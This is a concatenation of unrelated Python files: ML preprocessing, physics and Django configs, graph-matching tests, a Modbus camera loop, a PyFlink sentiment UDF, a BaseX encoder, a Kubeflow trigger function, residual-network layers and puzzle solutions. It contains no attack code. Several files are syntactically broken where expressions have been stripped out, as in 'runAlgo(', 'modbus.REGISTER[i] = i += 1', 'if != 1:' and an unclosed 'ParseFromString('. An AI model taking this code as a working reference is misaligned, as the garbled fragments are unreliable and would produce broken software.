import argparse import os from scipy.special import erf from scipy.stats import truncnorm import numpy as np import data def build_vector_cache(glove_filename, vec_cache_filename, vocab): print("Building vector cache...") with open(glove_filename) as f, open(vec_cache_filename, "w") as f2: for line in f: tok, vec = line.split(" ", 1) if tok in vocab: vocab.remove(tok) f2.write("{} {}".format(tok, vec)) def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100): def phi(zeta): return 1 / (np.sqrt(2 * np.pi)) * np.exp(-0.5 * zeta**2) def Phi(x): return 0.5 * (1 + erf(x / np.sqrt(2))) def tgt_loc_update(x): y1 = phi((a - x) / sigma) y2 = phi((b - x) / sigma) x1 = Phi((b - x) / sigma) x2 = Phi((a - x) / sigma) denom = x1 - x2 + 1E-4 return y1 / denom - y2 / denom x = tgt_loc direction = np.sign(tgt_loc - (b - a)) for _ in range(n_steps): x = tgt_loc - sigma * tgt_loc_update(x) tn = truncnorm((a - x) / sigma, (b - x) / sigma, loc=x, scale=sigma) rrange = np.arange(a, b + 1) pmf = tn.pdf(rrange) pmf /= np.sum(pmf) return pmf def discrete_lerp(a, b, ground_truth): pmf = np.zeros(b - a + 1) c = int(np.ceil(ground_truth + 1E-8)) f = int(np.floor(ground_truth)) pmf[min(c - a, b - a)] = ground_truth - f pmf[f - a] = c - ground_truth return pmf def smoothed_labels(truth, n_labels): return discrete_lerp(1, n_labels, truth) def preprocess(filename, output_name="sim_sparse.txt"): print("Preprocessing {}...".format(filename)) with open(filename) as f: values = [float(l.strip()) for l in f.readlines()] values = [" ".join([str(l) for l in smoothed_labels(v, 5)]) for v in values] with open(os.path.join(os.path.dirname(filename), output_name), "w") as f: f.write("\n".join(values)) def add_vocab(tok_filename, vocab): with open(tok_filename) as f: for line in f: vocab.update(line.strip().split()) def main(): base_conf = data.Configs.base_config() sick_conf = data.Configs.sick_config() sick_folder = sick_conf.sick_data vocab = set() for name in ("train", "dev", "test"): preprocess(os.path.join(sick_folder, name, "sim.txt")) add_vocab(os.path.join(sick_folder, name, "a.toks"), vocab) add_vocab(os.path.join(sick_folder, name, "b.toks"), vocab) build_vector_cache(base_conf.wordvecs_file, sick_conf.sick_cache, vocab) if __name__ == "__main__": main()
<gh_stars>100-1000 import FWCore.ParameterSet.Config as cms tifClusterFilter = cms.EDFilter("ClusterMultiplicityFilter", MaxNumberOfClusters = cms.uint32(300), ClusterCollection = cms.InputTag('siStripClusters') )
#!/usr/bin/env python3 import random import unittest import networkit as nk class TestMatchingAlgorithms(unittest.TestCase): def generateRandomWeights(self, g): if not g.isWeighted(): g = nk.graphtools.toWeighted(g) for e in g.iterEdges(): g.setWeight(e[0], e[1], random.random()) return g def setUp(self): self.g = nk.readGraph("input/PGPgiantcompo.graph", nk.Format.METIS) = self.generateRandomWeights(self.g) def hasUnmatchedNeighbors(self, g, m): for e in g.iterEdges(): if not m.isMatched(e[0]) and not m.isMatched(e[1]): return True return False def testPathGrowingMatcher(self): def runAlgo(g): pgm = nk.matching.PathGrowingMatcher(self.g) m = pgm.getMatching() runAlgo(self.g) runAlgo( def testSuitorMatcher(self): def doTest(g): m1 = nk.matching.SuitorMatcher(g, False).run().getMatching() nk.graphtools.sortEdgesByWeight(g, True) self.assertTrue(m1.isProper(g)) self.assertFalse(self.hasUnmatchedNeighbors(g, m1)) m2 = nk.matching.SuitorMatcher(g, True).run().getMatching() self.assertTrue(m2.isProper(g)) self.assertFalse(self.hasUnmatchedNeighbors(g, m2)) for u in g.iterNodes(): self.assertEqual(m1.mate(u), m2.mate(u)) doTest(self.g) doTest( if __name__ == "__main__": unittest.main()
<gh_stars>1000+ import sensor, image import time from pyb import UART from modbus import ModbusRTU sensor.reset() sensor.set_pixformat(sensor.GRAYSCALE) sensor.set_framesize(sensor.QQVGA) # we run out of memory if the resolution is much bigger... uart = UART(3,115200, parity=None, stop=2, timeout=1, timeout_char=4) modbus = ModbusRTU(uart, register_num=9999) sensor.skip_frames(time = 2000) clock = time.clock() while(True): if modbus.any(): modbus.handle(debug=True) else: clock.tick() img = sensor.snapshot() tags = img.find_apriltags() # defaults to TAG36H11 without "families". modbus.clear() modbus.REGISTER[0] = len(tags) if tags: print(tags) i = 1 for tag in tags: img.draw_rectangle(tag.rect(), color = 127) modbus.REGISTER[i] = i += 1 modbus.REGISTER[i] = i += 1 modbus.REGISTER[i] = i += 1 modbus.REGISTER[i] = i += 1 #print(modbus.REGISTER[0:15]) #print(clock.fps())
<filename>formats/ycd/ if "bpy" in locals(): import importlib importlib.reload(Animation) importlib.reload(AnimSequence) importlib.reload(Channel) importlib.reload(Clip) importlib.reload(ClipDictionary) importlib.reload(utils) else: from . import Animation from . import AnimSequence from . import Channel from . import Clip from . import ClipDictionary from . import utils import bpy
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations class Migration(migrations.Migration): dependencies = [ ('corpus', '0002_data_migration_dont_know_skip_merge'), ] operations = [ migrations.AlterField( model_name='evidencelabel', name='label', preserve_default=True, field=models.CharField( default='SK', null=True, max_length=2, choices=[ ('YE', 'Yes, relation is present'), ('NO', 'No relation present'), ('NS', 'Evidence is nonsense'), ('SK', 'Skipped labeling of this evidence') ] ), ), ]
""" ==================================== Data set of Markov transition fields ==================================== A Markov transition field is an image obtained from a time series, representing a field of transition probabilities for a discretized time series. Different strategies can be used to bin time series. It is implemented as :class:`pyts.image.MarkovTransitionField`. In this example, we consider the training samples of the `GunPoint dataset <>`_, consisting of 50 univariate time series of length 150. The Markov transition field of each time series is independently computed and the 50 Markov transition fields are plotted. """ # noqa:E501 # Author: <NAME> <<EMAIL>> # License: BSD-3-Clause import matplotlib.pyplot as plt from mpl_toolkits.axes_grid1 import ImageGrid from pyts.image import MarkovTransitionField from pyts.datasets import load_gunpoint # Load the GunPoint dataset X, _, _, _ = load_gunpoint(return_X_y=True) # Get the recurrence plots for all the time series mtf = MarkovTransitionField(n_bins=8) X_mtf = mtf.fit_transform(X) # Plot the 50 Gramian angular fields fig = plt.figure(figsize=(10, 5)) grid = ImageGrid(fig, 111, nrows_ncols=(5, 10), axes_pad=0.1, share_all=True, cbar_mode='single') for i, ax in enumerate(grid): im = ax.imshow(X_mtf[i], cmap='rainbow', origin='lower', vmin=0., vmax=1.) grid[0].get_yaxis().set_ticks([]) grid[0].get_xaxis().set_ticks([]) plt.colorbar(im, cax=grid.cbar_axes[0]) ax.cax.toggle_label(True) fig.suptitle("Markov transition fields for the 50 time series in the " "'GunPoint' dataset", y=0.92)
<gh_stars>1000+ from .bo_algorithm_components import LBFGSOptimizeAcquisition from ..models.meanstd_acqfunc_impl import EIAcquisitionFunction DEFAULT_ACQUISITION_FUNCTION = EIAcquisitionFunction DEFAULT_LOCAL_OPTIMIZER_CLASS = LBFGSOptimizeAcquisition DEFAULT_NUM_INITIAL_CANDIDATES = 250 DEFAULT_NUM_INITIAL_RANDOM_EVALUATIONS = 3
from pyflink.datastream import StreamExecutionEnvironment, TimeCharacteristic from pyflink.table import StreamTableEnvironment, DataTypes, EnvironmentSettings from pyflink.table.descriptors import ( Schema, Kafka, Json, Rowtime, OldCsv, FileSystem, ) from pyflink.table.udf import udf s_env = StreamExecutionEnvironment.get_execution_environment() s_env.set_stream_time_characteristic(TimeCharacteristic.EventTime) s_env.set_parallelism(1) st_env = StreamTableEnvironment.create( s_env, environment_settings = EnvironmentSettings.new_instance() .in_streaming_mode() .use_blink_planner() .build(), ) X, Y, sess = None, None, None @udf(result_type = DataTypes.STRING()) def predict(string): global X, Y, sess import tensorflow as tf import json import numpy as np def load_graph(frozen_graph_filename): with tf.gfile.GFile(frozen_graph_filename, 'rb') as f: graph_def = tf.GraphDef() graph_def.ParseFromString( with tf.Graph().as_default() as graph: tf.import_graph_def(graph_def) return graph if X is None or Y is None or sess is None: g = load_graph('/notebooks/frozen_model.pb') X = g.get_tensor_by_name('import/Placeholder:0') Y = g.get_tensor_by_name('import/logits:0') sess = tf.Session(graph = g) label = ['negative', 'positive'] maxlen = 50 UNK = 3 with open('/notebooks/dictionary-test.json', 'r') as fopen: dic = json.load(fopen) sentences = [string] x = np.zeros((len(sentences), maxlen)) for i, sentence in enumerate(sentences): for no, k in enumerate(sentence.split()[:maxlen][::-1]): x[i, -1 - no] = dic.get(k, UNK) indices = np.argmax(, feed_dict = {X: x}), axis = 1) return label[indices[0]] st_env.set_python_requirements('/notebooks/requirements.txt') st_env.register_function('predict', predict) st_env.connect( Kafka() .version('universal') .topic('test') .start_from_earliest() .property('zookeeper.connect', 'zookeeper:2181') .property('bootstrap.servers', 'kafka:9092') ).with_format( Json() .fail_on_missing_field(True) .schema( DataTypes.ROW( [ DataTypes.FIELD('datetime', DataTypes.STRING()), DataTypes.FIELD('text', DataTypes.STRING()), ] ) ) ).with_schema( Schema() .field('datetime', DataTypes.STRING()) .field('text', DataTypes.STRING()) ).in_append_mode().register_table_source( 'source' ) result_path = '/notebooks/output-tensorflow.csv' t_env.connect(FileSystem().path(result_path)).with_format( OldCsv() .field_delimiter(',') .field('datetime', DataTypes.STRING()) .field('sentence', DataTypes.STRING()) .field('label', DataTypes.STRING()) ).with_schema( Schema() .field('datetime', DataTypes.STRING()) .field('sentence', DataTypes.STRING()) .field('label', DataTypes.STRING()) ).in_append_mode().register_table_sink( 'sink' ) st_env.from_path('source').select( 'datetime, sentence, predict(sentence)' ).insert_into('sink') st_env.execute('predict')
import numpy as np import nimfa V = np.random.rand(40, 100) nmf = nimfa.Nmf(V, seed="nndsvd", rank=10, max_iter=12, update='euclidean', objective='fro') nmf_fit = nmf()
<gh_stars>100-1000 # # Copyright (C) 2015-2018 Dubalu LLC. All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # """ BaseX encoding """ __version__ = '0.0.1' class BaseX(object): def __init__(self, alphabet, translate): self.alphabet = alphabet self.translate = translate self.base = len(self.alphabet) self.decoder = [self.base] * 256 for i, a in enumerate(self.alphabet): o = ord(a) self.decoder[o] = i x = -1 for a in self.translate: o = ord(a) i = self.decoder[o] if i < self.base: x = i else: self.decoder[o] = x def encode_int(self, i, default_one=True): """Encode an integer using BaseX""" if not i and default_one: return self.alphabet[0] string = "" sum_chk = 0 while i: i, idx = divmod(i, self.base) string = self.alphabet[idx] + string sum_chk += idx sumsz = len(string) sum_chk += sumsz + sumsz / self.base return string, sum_chk % self.base def encode(self, v): """Encode a string using BaseX""" if not isinstance(v, bytes): raise TypeError("a bytes-like object is required, not '%s'" % type(v).__name__) p, acc = 1, 0 for c in map(ord, reversed(v)): acc += p * c p = p << 8 result, sum_chk = self.encode_int(acc, default_one=False) sum_chk = (self.base - (sum_chk % self.base)) % self.base return result + self.alphabet[sum_chk] def decode_int(self, v): """Decode a BaseX encoded string as an integer""" if not isinstance(v, str): v = v.decode('ascii') decimal = 0 sum_chk = 0 sumsz = 0 for char in v: o = ord(char) i = self.decoder[o] if i < 0: continue if i >= self.base: raise ValueError("Invalid character") decimal = decimal * self.base + i sum_chk += i sumsz += 1 sum_chk += sumsz + sumsz / self.base return decimal, sum_chk % self.base def decode(self, v): """Decode a BaseX encoded string""" if not isinstance(v, str): v = v.decode('ascii') while True: chk = self.decoder[ord(v[-1:])] v = v[:-1] if chk < 0: continue if chk >= self.base: raise ValueError("Invalid character") break acc, sum_chk = self.decode_int(v) sum_chk += chk if sum_chk % self.base: raise ValueError("Invalid checksum") result = [] while acc: result.append(acc & 0xff) acc >>= 8 return ''.join(map(chr, reversed(result))) def chksum(self, v): """Get checksum character for BaseX encoded string""" if not isinstance(v, str): v = v.decode('ascii') acc, sum_chk = self.decode_int(v) sum_chk = (self.base - (sum_chk % self.base)) % self.base return self.alphabet[sum_chk] b59 = BaseX('zGLUAC2EwdDRrkWBatmscxyYlg6jhP7K53TibenZpMVuvoO9H4XSQq8FfJN', '~l1IO0') b59decode = b59.decode b59encode = b59.encode def main(): """BaseX encode or decode FILE, or standard input, to standard output.""" import sys import argparse stdout = sys.stdout parser = argparse.ArgumentParser(description=main.__doc__) parser.add_argument( 'file', metavar='FILE', nargs='?', type=argparse.FileType('r'), default='-') parser.add_argument( '-d', '--decode', action='store_true', help='decode data') parser.add_argument( '-c', '--check', action='store_true', help='append a checksum before encoding') args = parser.parse_args() fun = { (False, False): b59encode, (True, False): b59decode, }[(args.decode, args.check)] data ='\n') try: result = fun(data) except Exception as e: sys.exit(e) if not isinstance(result, bytes): result = result.encode('ascii') stdout.write(result) if __name__ == '__main__': main()
<gh_stars>100-1000 # -*- coding: utf-8 -*- # # Copyright (c) 2012 All rights reserved. # # @author: <NAME> <<EMAIL>> # Created on Jun 30, 2012 # from celery.task import task from d3status.mail import send_email @task def send_email_task(fr, to, subject, body, html=None, attachments=[]): send_email(fr, to, subject, body, html, attachments)
<gh_stars>100-1000 # Generated by Django 2.1.7 on 2019-11-23 09:53 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('clist', '0011_auto_20190818_1125'), ] operations = [ migrations.AddIndex( model_name='contest', index=models.Index(fields=['start_time'], name='clist_conte_start_t_9eec7a_idx'), ), migrations.AddIndex( model_name='contest', index=models.Index(fields=['end_time'], name='clist_conte_end_tim_341782_idx'), ), ]
<reponame>themantalope/DLTK<filename>dltk/core/ from __future__ import unicode_literals from __future__ import print_function from __future__ import division from __future__ import absolute_import import tensorflow as tf import numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): """Implementation of a 3D residual unit according to [1]. This implementation supports strided convolutions and automatically handles different input and output filters. [1] <NAME> et al. Identity Mappings in Deep Residual Networks. ECCV 2016. Args: inputs (tf.Tensor): Input tensor to the residual unit. Is required to have a rank of 5 (i.e. [batch, x, y, z, channels]). out_filters (int): Number of convolutional filters used in the sub units. kernel_size (tuple, optional): Size of the convoltional kernels used in the sub units strides (tuple, optional): Convolution strides in (x,y,z) of sub unit 0. Allows downsampling of the input tensor via strides convolutions. mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional): A function to use as activation function. use_bias (bool, optional): Train a bias with each convolution. kernel_initializer (TYPE, optional): Initialisation of convolution kernels bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer (None, optional): Additional regularisation op bias_regularizer (None, optional): Additional regularisation op Returns: tf.Tensor: Output of the residual unit """ pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \ 'Module was initialised for a different input shape' x = inputs orig_x = x # Handle strided convolutions if != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel size to prevent losing information k = [s * 2 if s > 1 else k for k, s in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add the residual with tf.variable_scope('sub_unit_add'): # Handle differences in input and output filter sizes if in_filters < out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) x += orig_x return x
<filename>examples/ # import the library from appJar import gui app = gui() # top slice - CREATE the GUI app.addLabel("title", "Welcome to appJar") # add a label app.setLabelBg("title", "red") # set the label's background to be red app.go() # bottom slice - START the GUI
<reponame>LeandroTk/Algorithms<filename>coding_interviews/leetcode/medium/reduce_array_size_to_the_half/ # ''' Time Complexity: O(NlogN) Space Complexity: O(N) ''' def min_set_size(arr): num_to_count, counts, min_size, current_length = {}, [], 0, len(arr) for num in arr: if num in num_to_count: num_to_count[num] += 1 else: num_to_count[num] = 1 for num in num_to_count: counts.append(num_to_count[num]) counts = reversed(sorted(counts)) if len(arr) % 2 == 0: cut = len(arr) / 2 else: cut = len(arr + 1) / 2 for count in counts: min_size += 1 current_length -= count if current_length <= cut: return min_size return min_size
_base_ = '' optimizer = dict(lr=0.010)
""" The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0). Copyright (c) COLONOLNUTTY """ from typing import Any from sims4communitylib.modinfo import ModInfo from sims4communitylib.testing.common_assertion_utils import CommonAssertionUtils from sims4communitylib.testing.common_test_service import CommonTestService from sims4communitylib.utils.common_function_utils import CommonFunctionUtils # noinspection PyMissingOrEmptyDocstring @CommonTestService.test_class(ModInfo.get_identity()) class CommonFunctionUtilsTests: @staticmethod @CommonTestService.test(True, True, True, True) @CommonTestService.test(True, False, True, False) @CommonTestService.test(True, False, False, True) @CommonTestService.test(False, False, False, False) def run_predicates_as_one_should_work_properly(func_result_one: bool, func_result_two: bool, all_must_pass: bool, expected_result: bool): def _function_one(*_, **__) -> Any: return func_result_one def _function_two(*_, **__) -> Any: return func_result_two result = CommonFunctionUtils.run_predicates_as_one((_function_one, _function_two), all_must_pass=all_must_pass)() CommonAssertionUtils.are_equal(result, expected_result) @staticmethod @CommonTestService.test(True, False) @CommonTestService.test(False, True) def run_predicate_with_reversed_result_should_work_properly(func_result: bool, expected_result: bool): def _function(*_, **__) -> Any: return func_result result = CommonFunctionUtils.run_predicate_with_reversed_result(_function)() CommonAssertionUtils.are_equal(result, expected_result) @staticmethod @CommonTestService.test() def run_with_arguments_should_work_properly() -> None: _additional_value = 'No' _additional_key_word_value = 'What' normal_val = 'one' normal_key_val = 'two' def _function(normal_arg: str, value_one: str, normal_key_arg: str=None, key_value: str=None) -> Any: CommonAssertionUtils.are_equal(value_one, _additional_value) CommonAssertionUtils.are_equal(key_value, _additional_key_word_value) CommonAssertionUtils.are_equal(normal_arg, normal_val) CommonAssertionUtils.are_equal(normal_key_arg, normal_key_val) if normal_arg == normal_val and normal_key_arg == normal_key_val and value_one == _additional_value and key_value == _additional_key_word_value: return True result = CommonFunctionUtils.run_with_arguments(_function, _additional_value, key_value=_additional_key_word_value)(normal_val, normal_key_arg=normal_key_val) CommonAssertionUtils.is_true(result, message='Failed to send proper arguments: {}'.format(result))
<filename>Stock/Data/Engine/Common/ from .DyStockDataCodeTable import * from .DyStockDataTradeDayTable import * from .DyStockDataSectorCodeTable import * class DyStockDataCommonEngine(object): """ 代码表和交易日数据引擎 """ def __init__(self, mongoDbEngine, gateway, info): self._mongoDbEngine = mongoDbEngine self._gateway = gateway self._info = info self._codeTable = DyStockDataCodeTable(self._mongoDbEngine, self._gateway, self._info) self._tradeDayTable = DyStockDataTradeDayTable(self._mongoDbEngine, self._gateway, self._info) self._sectorCodeTable = DyStockDataSectorCodeTable(self._mongoDbEngine, self._gateway, self._info) def updateCodes(self): return self._codeTable.update() def updateTradeDays(self, startDate, endDate): return self._tradeDayTable.update(startDate, endDate) def updateSectorCodes(self, sectorCode, startDate, endDate): return self._sectorCodeTable.update(sectorCode, startDate, endDate) def updateAllSectorCodes(self, startDate, endDate): return self._sectorCodeTable.updateAll(startDate, endDate) def getTradeDays(self, startDate, endDate): return self._tradeDayTable.get(startDate, endDate) def getLatestDateInDb(self): return self._tradeDayTable.getLatestDateInDb() def getLatestTradeDayInDb(self): return self._tradeDayTable.getLatestTradeDayInDb() def getIndex(self, code): return self._codeTable.getIndex(code) def getCode(self, name): return self._codeTable.getCode(name) def getIndexStockCodes(self, index=None): return self._codeTable.getIndexStockCodes(index) def getIndexSectorStockCodes(self, index=None): if index in DyStockCommon.sectors: return self._sectorCodeTable.getSectorStockCodes(index) return self._codeTable.getIndexStockCodes(index) @property def shIndex(self): return self._codeTable.shIndex @property def szIndex(self): return self._codeTable.szIndex @property def cybIndex(self): return self._codeTable.cybIndex @property def zxbIndex(self): return self._codeTable.zxbIndex @property def etf50(self): return self._codeTable.etf50 @property def etf300(self): return self._codeTable.etf300 @property def etf500(self): return self._codeTable.etf500 @property def stockFunds(self): return self._codeTable.stockFunds @property def stockSectors(self): return self._codeTable.stockSectors @property def stockCodesFunds(self): return self._codeTable.stockCodesFunds @property def stockAllCodesFunds(self): return self._codeTable.stockAllCodesFunds @property def stockAllCodesFundsSectors(self): return self._codeTable.stockAllCodesFundsSectors @property def stockAllCodes(self): return self._codeTable.stockAllCodes @property def stockCodes(self): return self._codeTable.stockCodes @property def stockIndexes(self): return self._codeTable.stockIndexes @property def stockIndexesSectors(self): return self._codeTable.stockIndexesSectors def tDaysOffset(self, base, n): return self._tradeDayTable.tDaysOffset(base, n) def tDaysOffsetInDb(self, base, n=0): return self._tradeDayTable.tDaysOffsetInDb(base, n) def tDays(self, start, end): return self._tradeDayTable.get(start, end) def tDaysCountInDb(self, start, end): return self._tradeDayTable.tDaysCountInDb(start, end) def tLatestDay(self): return self._tradeDayTable.tLatestDay() def tOldestDay(self): return self._tradeDayTable.tOldestDay() def isInTradeDayTable(self, startDate, endDate): return self._tradeDayTable.isIn(startDate, endDate) def load(self, dates, codes=None): if not self._codeTable.load(codes): return False return self._tradeDayTable.load(dates) def loadCodeTable(self, codes=None): return self._codeTable.load(codes) def loadTradeDays(self, dates): return self._tradeDayTable.load(dates) def loadSectorCodeTable(self, sectorCode, date, codes=None): return self._sectorCodeTable.load(sectorCode, date, codes) def getSectorCodes(self, sectorCode): return self._sectorCodeTable.getSectorStockCodes(sectorCode)
#!/usr/bin/env python3 # a=[0]*6 for i in range(6): a[i]=[int(x) for x in input().split()] c=-9*9 for i in range(1,5): for j in range(1,5): c=max(c,a[i-1][j-1]+a[i-1][j]+a[i-1][j+1]+a[i][j]+a[i+1][j-1]+a[i+1][j]+a[i+1][j+1]) print(c)
#!/usr/bin/env python2.7 import json from pprint import pprint import os import sys import re import dokumentor import subprocess def parseParam(arg, indent=0, isReturn=False): out = "" if isReturn: out += "Returns (%s): %s\n" % (parseParamsType(arg["typed"]), arg["description"]) else: out += "%s* `%s` (%s): %s\n" % (' ' * indent, arg["name"], parseParamsType(arg["typed"]), arg["description"]) if "params" in arg: # Callback function for subArg in arg["params"]: out += parseParam(subArg, indent + 4) elif type(arg["typed"][0]) is dict: # Object for subArg in arg["typed"][0]["details"]: out += parseParam(subArg, 0 if isReturn else indent + 4) elif type(arg["typed"][0]) is list: # Array of Object for subArg in arg["typed"][0][0]["details"]: out += parseParam(subArg, 0 if isReturn else indent + 4) return out def parseParamsType(types): out = "" comma = "" for t in types: out += comma if type(t) is list: out += "Object[]" elif type(t) is dict: out += "Object" else: if t[0] == "[": out += t[1:-1].capitalize() + "[]" else: if t == "null": out += t else: out += t if t[0].isupper() else t.capitalize() comma = " | " return out def parseMethod(method, isEvent=False): out = "" if isEvent: out += "\n## Event: %s\n" % (re.sub("[A-Za-z_0-9]+\.", "", method["name"])) else: fnArgs = "" if len(method["params"]) > 0: comma = "" for arg in method["params"]: name = comma + arg["name"] if arg["default"] != "None": name += "=%s" % arg["default"] if arg["is_optional"]: name = "[%s]" % name fnArgs += name comma = ", " out += "\n## %s%s%s(%s)\n" % ("`static `" if method["is_static"] else "", "new " if method["is_constructor"] else "", method["name"], fnArgs) if method["is_slow"]: out += "<!-- YAML\n- Slow method\n-->\n" out += method["description"] + "\n" if len(method["params"]) > 0: out += "\nParams:\n" for arg in method["params"]: out += parseParam(arg) if method["returns"] and not method["is_constructor"]: if method["returns"]["nullable"]: method["returns"]["typed"].append("null") tmp = parseParam(method["returns"], isReturn=True) if tmp: out += "\n" + tmp out += parseSeeAlso(method["sees"]) return out def parseProperty(prop): out = "" out += "\n## %s%s%s%s (%s)\n" % ("`static` " if prop["is_static"] else "", "`readonly` " if prop["is_readonly"] else "", prop["name"], "=" + prop["default"] if prop["default"] != "None" else "", parseParamsType(prop["typed"])) out += prop["description"] + "\n" out += parseExample(prop["examples"]) out += parseSeeAlso(prop["sees"]) return out def parseSeeAlso(seeAlso): return "" """ out = "" if len(seeAlso) > 0: out += "\nSee also:\n" for see in seeAlso: out += "* `%s`\n" % (see["data"]) return out """ def parseExample(examples): out = "" if len(examples) > 0: out += "\n" for ex in examples: out += "\n```%s\n%s\n```\n" % (ex["language"], ex["data"]) return out def parse(klass, data): out = "" out += "# Class: %s" % (klass) + "\n" item = data["base"][klass] out += item["description"] out += parseExample(item["examples"]) out += parseSeeAlso(item["sees"]) if data["constructors"]: out += parseMethod(data["constructors"][klass]) if data["methods"]: for name, method in data["methods"].iteritems(): out += parseMethod(method) if data["static_methods"]: for name, method in data["static_methods"].iteritems(): out += parseMethod(method) if data["properties"]: for name, prop in data["properties"].iteritems(): out += parseProperty(prop) if data["events"]: for evName, ev in data["events"].iteritems(): out += parseMethod(ev, isEvent=True) return out print("Running dokumentor") class captureDokumentor: def __init__(self): = "" def write(self, msg): += msg def flush(self=None): pass sys.stdout = captureDokumentor() dokumentor.process("../docs/") docs = sys.modules['DOCC'].DOC"json", docs) data = json.loads( sys.stdout = sys.__stdout__ hierarchy = {} for section, items in data["_sections"].iteritems(): if section not in data: data[section] = {"base": { section: {"description": "", "sees":[], "examples": {}}}, "constructors": {}, "methods": [], "properties": [], "events":[], "static_methods": []} hierarchy[section] = {"data": parse(section, data[section])} hierarchy[section]["children"] = {} for klass in items: hierarchy[section]["children"][klass] = parse(klass, data[klass]) path = "../docs/en/api/" try: os.mkdir(path) except: pass for directory in hierarchy: if len(hierarchy[directory]["children"]) > 1: subPath = path + directory + "/" try: os.mkdir(subPath) except: pass print("Writing %s" % subPath + directory + ".md") with open(subPath + directory + ".md", "w") as f: f.write(hierarchy[directory]["data"]) for child in hierarchy[directory]["children"]: print(" - Writing %s" % subPath + child + ".md") with open(subPath + child + ".md", "w") as f: f.write(hierarchy[directory]["children"][child]) else: print("Writing %s" % path + directory + ".md") with open(path + directory + ".md", "w") as f: f.write(hierarchy[directory]["data"])
<filename>ml/notebook_examples/functions/ import logging import datetime import logging import time import kfp import kfp.compiler as compiler import kfp.dsl as dsl import requests # TODO: replace yours # HOST = 'https://<yours>' HOST = '' @dsl.pipeline( name='Sequential', description='A pipeline with two sequential steps.' ) def sequential_pipeline(filename='gs://ml-pipeline-playground/shakespeare1.txt'): """A pipeline with two sequential steps.""" op1 = dsl.ContainerOp( name='filechange', image='library/bash:4.4.23', command=['sh', '-c'], arguments=['echo "%s" > /tmp/results.txt' % filename], file_outputs={'newfile': '/tmp/results.txt'}) op2 = dsl.ContainerOp( name='echo', image='library/bash:4.4.23', command=['sh', '-c'], arguments=['echo "%s"' % op1.outputs['newfile']] ) def get_access_token(): url = '' r = requests.get(url, headers={'Metadata-Flavor': 'Google'}) r.raise_for_status() access_token = r.json()['access_token'] return access_token def hosted_kfp_test(data, context):'Event ID: {}'.format(context.event_id))'Event type: {}'.format(context.event_type))'Data: {}'.format(data))'Bucket: {}'.format(data['bucket']))'File: {}'.format(data['name'])) file_uri = 'gs://%s/%s' % (data['bucket'], data['name'])'Using file uri: %s', file_uri)'Metageneration: {}'.format(data['metageneration']))'Created: {}'.format(data['timeCreated']))'Updated: {}'.format(data['updated'])) token = get_access_token()'attempting to launch pipeline run.') ts = int(datetime.datetime.utcnow().timestamp() * 100000) client = kfp.Client(host=HOST, existing_token=token) compiler.Compiler().compile(sequential_pipeline, '/tmp/sequential.tar.gz') exp = client.create_experiment(name='gcstriggered') # this is a 'get or create' op res = client.run_pipeline(, 'sequential_' + str(ts), '/tmp/sequential.tar.gz', params={'filename': file_uri})
from abc import ABC, abstractmethod from typing import List from torch import Tensor from torch.nn import Module from tha2.nn.base.module_factory import ModuleFactory class BatchInputModule(Module, ABC): def __init__(self): super().__init__() @abstractmethod def forward_from_batch(self, batch: List[Tensor]): pass class BatchInputModuleFactory(ModuleFactory): def __init__(self): super().__init__() @abstractmethod def create(self) -> BatchInputModule: pass
